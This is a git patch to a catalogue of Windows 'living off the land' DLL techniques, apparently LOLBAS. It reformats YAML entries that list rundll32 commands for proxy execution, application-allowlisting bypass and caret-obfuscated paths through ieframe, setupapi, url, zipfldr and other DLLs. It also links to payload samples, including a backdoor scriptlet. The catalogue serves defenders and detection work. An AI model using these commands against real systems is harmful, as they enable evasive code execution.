can be renamed. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\ieframe.dll - - Path: c:\windows\syswow64\ieframe.dll -Code_Sample: - - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url -Detection: - - IOC: -Resources: - - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/bohops/status/997690405092290561 - - Link: https://windows10dll.nirsoft.net/ieframe_dll.html -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' - - Person: Adam - Handle: '@hexacorn' ---- - +--- +Name: Ieaframe.dll +Description: Internet Browser DLL for translating HTML code. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\ieframe.dll + - Path: c:\windows\syswow64\ieframe.dll +Code_Sample: + - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url +Detection: + - IOC: +Resources: + - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/bohops/status/997690405092290561 + - Link: https://windows10dll.nirsoft.net/ieframe_dll.html +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' + - Person: Adam + Handle: '@hexacorn' +--- + diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 9866975..63b335a 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -1,28 +1,28 @@ ---- -Name: Mshtml.dll -Description: Microsoft HTML Viewer -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" - Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). - UseCase: Launch an HTA application. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\mshtml.dll - - Path: c:\windows\syswow64\mshtml.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/pabraeken/status/998567549670477824 - - Link: https://windows10dll.nirsoft.net/mshtml_dll.html -Acknowledgement: - - Person: Pierre-Alexandre Braeken - Handle: '@pabraeken' ---- +--- +Name: Mshtml.dll +Description: Microsoft HTML Viewer +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" + Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). + UseCase: Launch an HTA application. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\mshtml.dll + - Path: c:\windows\syswow64\mshtml.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/pabraeken/status/998567549670477824 + - Link: https://windows10dll.nirsoft.net/mshtml_dll.html +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 35c726a..8a96d19 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -1,28 +1,28 @@ ---- -Name: Pcwutl.dll -Description: Microsoft HTML Viewer -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe - Description: Launch executable by calling the LaunchApplication function. - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\pcwutl.dll - - Path: c:\windows\syswow64\pcwutl.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/harr0ey/status/989617817849876488 - - Link: https://windows10dll.nirsoft.net/pcwutl_dll.html -Acknowledgement: - - Person: Matt harr0ey - Handle: '@harr0ey' ---- +--- +Name: Pcwutl.dll +Description: Microsoft HTML Viewer +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe + Description: Launch executable by calling the LaunchApplication function. + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\pcwutl.dll + - Path: c:\windows\syswow64\pcwutl.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/harr0ey/status/989617817849876488 + - Link: https://windows10dll.nirsoft.net/pcwutl_dll.html +Acknowledgement: + - Person: Matt harr0ey + Handle: '@harr0ey' +--- diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 06ab00e..a5b1655 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -1,46 +1,46 @@ ---- -Name: Setupapi.dll -Description: Windows Setup Application Programming Interface -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf - Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. - UseCase: Load an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\setupapi.dll - - Path: c:\windows\syswow64\setupapi.dll -Code_Sample: - - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct - - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf -Detection: - - IOC: -Resources: - - Link: https://github.com/huntresslabs/evading-autoruns - - Link: https://twitter.com/pabraeken/status/994742106852941825 - - Link: https://windows10dll.nirsoft.net/setupapi_dll.html -Acknowledgement: - - Person: Kyle Hanslovan (COM Scriptlet) - Handle: '@KyleHanslovan' - - Person: Huntress Labs (COM Scriptlet) - Handle: '@HuntressLabs' - - Person: Casey Smith (COM Scriptlet) - Handle: '@subTee' - - Person: Nick Carr (Threat Intel) - Handle: '@ItsReallyNick' ---- +--- +Name: Setupapi.dll +Description: Windows Setup Application Programming Interface +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification. + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf + Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. + UseCase: Load an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\setupapi.dll + - Path: c:\windows\syswow64\setupapi.dll +Code_Sample: + - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf + - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct + - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct + - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf +Detection: + - IOC: +Resources: + - Link: https://github.com/huntresslabs/evading-autoruns + - Link: https://twitter.com/pabraeken/status/994742106852941825 + - Link: https://windows10dll.nirsoft.net/setupapi_dll.html +Acknowledgement: + - Person: Kyle Hanslovan (COM Scriptlet) + Handle: '@KyleHanslovan' + - Person: Huntress Labs (COM Scriptlet) + Handle: '@HuntressLabs' + - Person: Casey Smith (COM Scriptlet) + Handle: '@subTee' + - Person: Nick Carr (Threat Intel) + Handle: '@ItsReallyNick' +--- diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 7e006cf..7aeb700 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,32 +1,32 @@ ---- -Name: Shdocvw.dll -Description: Shell Doc Object and Control Library. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\shdocvw.dll - - Path: c:\windows\syswow64\shdocvw.dll -Code_Sample: - - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url -Detection: - - IOC: -Resources: - - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/bohops/status/997690405092290561 - - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html -Acknowledgement: - - Person: Adam - Handle: '@hexacorn' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Shdocvw.dll +Description: Shell Doc Object and Control Library. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\shdocvw.dll + - Path: c:\windows\syswow64\shdocvw.dll +Code_Sample: + - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url +Detection: + - IOC: +Resources: + - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/bohops/status/997690405092290561 + - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html +Acknowledgement: + - Person: Adam + Handle: '@hexacorn' + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 7231311..d4f554c 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -1,51 +1,51 @@ ---- -Name: Shell32.dll -Description: Windows Shell Common Dll -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll - Description: Launch a DLL payload by calling the Control_RunDLL function. - UseCase: Load a DLL payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe - Description: Launch an executable by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" - Description: Launch command line by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 -Full_Path: - - Path: c:\windows\system32\shell32.dll - - Path: c:\windows\syswow64\shell32.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/Hexacorn/status/885258886428725250 - - Link: https://twitter.com/pabraeken/status/991768766898941953 - - Link: https://twitter.com/mattifestation/status/776574940128485376 - - Link: https://twitter.com/KyleHanslovan/status/905189665120149506 - - Link: https://windows10dll.nirsoft.net/shell32_dll.html -Acknowledgement: - - Person: Adam (Control_RunDLL) - Handle: '@hexacorn' - - Person: Pierre-Alexandre Braeken (ShellExec_RunDLL) - Handle: '@pabraeken' - - Person: Matt Graeber (ShellExec_RunDLL) - Handle: '@mattifestation' - - Person: Kyle Hanslovan (ShellExec_RunDLL) - Handle: '@KyleHanslovan' ---- +--- +Name: Shell32.dll +Description: Windows Shell Common Dll +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll + Description: Launch a DLL payload by calling the Control_RunDLL function. + UseCase: Load a DLL payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe + Description: Launch an executable by calling the ShellExec_RunDLL function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" + Description: Launch command line by calling the ShellExec_RunDLL function. + UseCase: Run an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 +Full_Path: + - Path: c:\windows\system32\shell32.dll + - Path: c:\windows\syswow64\shell32.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/Hexacorn/status/885258886428725250 + - Link: https://twitter.com/pabraeken/status/991768766898941953 + - Link: https://twitter.com/mattifestation/status/776574940128485376 + - Link: https://twitter.com/KyleHanslovan/status/905189665120149506 + - Link: https://windows10dll.nirsoft.net/shell32_dll.html +Acknowledgement: + - Person: Adam (Control_RunDLL) + Handle: '@hexacorn' + - Person: Pierre-Alexandre Braeken (ShellExec_RunDLL) + Handle: '@pabraeken' + - Person: Matt Graeber (ShellExec_RunDLL) + Handle: '@mattifestation' + - Person: Kyle Hanslovan (ShellExec_RunDLL) + Handle: '@KyleHanslovan' +--- diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index fffd442..9f8cb02 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -1,44 +1,44 @@ ---- -Name: Syssetup.dll -Description: Windows NT System Setup -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window). - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf - Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. - UseCase: Load an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\syssetup.dll - - Path: c:\windows\syswow64\syssetup.dll -Code_Sample: - - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415 -Detection: - - IOC: -Resources: - - Link: https://twitter.com/pabraeken/status/994392481927258113 - - Link: https://twitter.com/harr0ey/status/975350238184697857 - - Link: https://twitter.com/bohops/status/975549525938135040 - - Link: https://windows10dll.nirsoft.net/syssetup_dll.html -Acknowledgement: - - Person: Pierre-Alexandre Braeken (Execute) - Handle: '@pabraeken' - - Person: Matt harr0ey (Execute) - Handle: '@harr0ey' - - Person: Jimmy (Scriptlet) - Handle: '@bohops' ---- +--- +Name: Syssetup.dll +Description: Windows NT System Setup +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window). + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf + Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. + UseCase: Load an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\syssetup.dll + - Path: c:\windows\syswow64\syssetup.dll +Code_Sample: + - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf + - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct + - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415 +Detection: + - IOC: +Resources: + - Link: https://twitter.com/pabraeken/status/994392481927258113 + - Link: https://twitter.com/harr0ey/status/975350238184697857 + - Link: https://twitter.com/bohops/status/975549525938135040 + - Link: https://windows10dll.nirsoft.net/syssetup_dll.html +Acknowledgement: + - Person: Pierre-Alexandre Braeken (Execute) + Handle: '@pabraeken' + - Person: Matt harr0ey (Execute) + Handle: '@harr0ey' + - Person: Jimmy (Scriptlet) + Handle: '@bohops' +--- diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 5b82185..d8164b6 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -1,78 +1,78 @@ ---- -Name: Url.dll -Description: Internet Shortcut Shell Extension DLL. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" - Description: Launch a HTML application payload by calling OpenURL. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Description: Launch an executable by calling OpenURL. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe - Description: Launch an executable by calling FileProtocolHandler. - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Description: Launch an executable by calling FileProtocolHandler. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta - Description: Launch a HTML application payload by calling FileProtocolHandler. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\url.dll - - Path: c:\windows\syswow64\url.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/DissectMalware/status/995348436353470465 - - Link: https://twitter.com/bohops/status/974043815655956481 - - Link: https://twitter.com/yeyint_mth/status/997355558070927360 - - Link: https://twitter.com/Hexacorn/status/974063407321223168 - - Link: https://windows10dll.nirsoft.net/url_dll.html -Acknowledgement: - - Person: Adam (OpenURL) - Handle: '@hexacorn' - - Person: Jimmy (OpenURL) - Handle: '@bohops' - - Person: Malwrologist (FileProtocolHandler - HTA) - Handle: '@DissectMalware' - - Person: r0lan (Obfuscation) - Handle: '@r0lan' ---- +--- +Name: Url.dll +Description: Internet Shortcut Shell Extension DLL. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" + Description: Launch a HTML application payload by calling OpenURL. + UseCase: Invoke an HTML Application via mshta.exe (Default Handler). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + UseCase: Load an executable payload by calling a .url file with or without quotes. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable by calling OpenURL. + UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe + Description: Launch an executable by calling FileProtocolHandler. + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable by calling FileProtocolHandler. + UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta + Description: Launch a HTML application payload by calling FileProtocolHandler. + UseCase: Invoke an HTML Application via mshta.exe (Default Handler). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\url.dll + - Path: c:\windows\syswow64\url.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/DissectMalware/status/995348436353470465 + - Link: https://twitter.com/bohops/status/974043815655956481 + - Link: https://twitter.com/yeyint_mth/status/997355558070927360 + - Link: https://twitter.com/Hexacorn/status/974063407321223168 + - Link: https://windows10dll.nirsoft.net/url_dll.html +Acknowledgement: + - Person: Adam (OpenURL) + Handle: '@hexacorn' + - Person: Jimmy (OpenURL) + Handle: '@bohops' + - Person: Malwrologist (FileProtocolHandler - HTA) + Handle: '@DissectMalware' + - Person: r0lan (Obfuscation) + Handle: '@r0lan' +--- diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index a22a8a7..d72ecf1 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -1,39 +1,39 @@ ---- -Name: Zipfldr.dll -Description: Compressed Folder library -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe - Description: Launch an executable payload by calling RouteTheCall. - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Description: Launch an executable payload by calling RouteTheCall (obfuscated). - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\zipfldr.dll - - Path: c:\windows\syswow64\zipfldr.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/moriarty_meng/status/977848311603380224 - - Link: https://twitter.com/bohops/status/997896811904929792 - - Link: https://windows10dll.nirsoft.net/zipfldr_dll.html -Acknowledgement: - - Person: Moriarty (Execution) - Handle: '@moriarty_meng' - - Person: r0lan (Obfuscation) - Handle: '@r0lan' ---- +--- +Name: Zipfldr.dll +Description: Compressed Folder library +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe + Description: Launch an executable payload by calling RouteTheCall. + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable payload by calling RouteTheCall (obfuscated). + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\zipfldr.dll + - Path: c:\windows\syswow64\zipfldr.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/moriarty_meng/status/977848311603380224 + - Link: https://twitter.com/bohops/status/997896811904929792 + - Link: https://windows10dll.nirsoft.net/zipfldr_dll.html +Acknowledgement: + - Person: Moriarty (Execution) + Handle: '@moriarty_meng' + - Person: r0lan (Obfuscation) + Handle: '@r0lan' +--- From 5ec4de562be1e936be4b46f4da1a29e7e252aecc Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:45:25 +0000 Subject: [PATCH 04/19] Fixed acknowledgements --- YML-Template.yml | 4 ++-- yml/LOLUtilz/OSBinaries/Explorer.yml | 4 +++- yml/LOLUtilz/OSBinaries/Netsh.yml | 2 -- yml/LOLUtilz/OSBinaries/Nltest.yml | 4 +++- yml/LOLUtilz/OSBinaries/Openwith.yml | 5 +++-- yml/LOLUtilz/OSBinaries/Powershell.yml | 4 +++- yml/LOLUtilz/OSBinaries/Psr.yml | 1 - yml/LOLUtilz/OSBinaries/Robocopy.yml | 2 -- yml/LOLUtilz/OtherBinaries/AcroRd32.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Gpup.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Nlnotes.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Notes.yml | 